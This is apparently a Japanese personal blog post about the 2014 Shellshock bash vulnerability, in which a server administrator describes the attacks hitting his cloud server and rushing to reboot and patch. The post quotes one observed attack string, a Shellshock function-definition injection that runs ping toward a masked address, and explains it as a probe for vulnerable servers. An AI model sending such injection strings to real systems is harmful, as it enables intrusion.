bashの脆弱性(CVE-2014-6271)で大騒ぎ中
関連記事
- IntelのCPUに新たな脆弱性、Downfall。第6世代Skylakeから第11世代Rocket Lakeまで影響。情報漏えいの恐れ 【2023年08月09日(水)】
- 【#Windows11】Windows 11の要件でもあるTPM 2.0に脆弱性。数十億台に影響 【2023年03月07日(火)】
- LinuxカーネルにCVSS10.0の脆弱性 SMBサーバでリモート実行のリスク(22/12/28) 【2022年12月28日(水)】
- 【Log4j】ログ管理ソフトに欠陥、Amazonなど調査(21/12/14) 【2021年12月14日(火)】
- 「やばすぎる」 Javaライブラリ「Log4j」にゼロデイ脆弱性、任意のリモートコードを実行可能 【2021年12月10日(金)】
うへっ!OpenSSLに続いてまたかいな
って,すでにうちのクラウドサーバーにも攻撃が始まっておった(汗
とりあえず,第一防壁で全て跳ね返しておるが
CVE-2014-6271なパッチは,昨日確認したら,当たってた
んが,CVE-2014-7169がまだ当たっていない(滝汗
いや,再起動すれば,パッチは当たるんじゃが
現場が今使ってやがる
緊急リブートしたいぞぉ~~
稼働ログとにらめっこして,リブートタイミングを図っているぞい
っちゅうか,今回のセキュリティバグも,かなりお粗末すぎるぞい
これ,民生ルーターとか大丈夫じゃろか?Linuxで動いているブツ,けっこうあるがのぉ
【追記】
こんな物騒なコマンド,投げつけてきてまする
“() { :; }; /bin/ping -c 1 ***.***.***.***”
パッチが当たってないと,このpingが「サーバー内」で起動かかって,サーバーから目的のアドレスにpingを飛ばすってやつですな
んで,「穴が空いてるじぃ~」をハッカーさんへ御連絡
んで,本攻撃が始まると((((;゚Д゚))))ガクガクブルブル
ってことで,サーバーを緊急リブートして,全てのパッチを当てましたっす(;´Д`)ハァハァ
UNIX系のソフト「bash」に重大バグ、システム乗っ取りも
[ボストン 24日 ロイター] – 基本ソフト(OS)Linux(リナックス)上で広く使われているソフトウエア「bash」に、新しくセキュリティー上のバグがあることが分かった。専門家らが24日警告した。4月に発覚したオンラインのデータ暗号化ソフトのバグ「ハートブリード」より大きな被害を引き起こす危険性があるという。 (以下略) |
ロイター |
コメント
こどもの日,らしい.城主生誕記念の軍事パレード決行なのかっ!?
今朝,寒いよっ!暑くなったり寒くなったりで自律神経が辛い
グリコ「プッチンプリンやカフェオーレ」目標の5月中旬に出荷再開できず 停止期間を延長決定
【#インボイス】消費税の納付,督促状,らしい...ドロドロドロ 所得税の口座引落登録のみじゃNGっぽい
北海道 根室 軽トラックにヒグマが衝突 乗っていた2人けがなし
火野正平さん、腰痛で撮影中断 NHKBS「にっぽん縦断 こころ旅」 ネットに案ずる声
ゴールデンウィークがスタート 見事な土砂降りワロタ
【#RUANG】インドネシア:ルアング山で火山が大規模噴火:愛媛で震度6弱な緊急地震速報(24/4/18)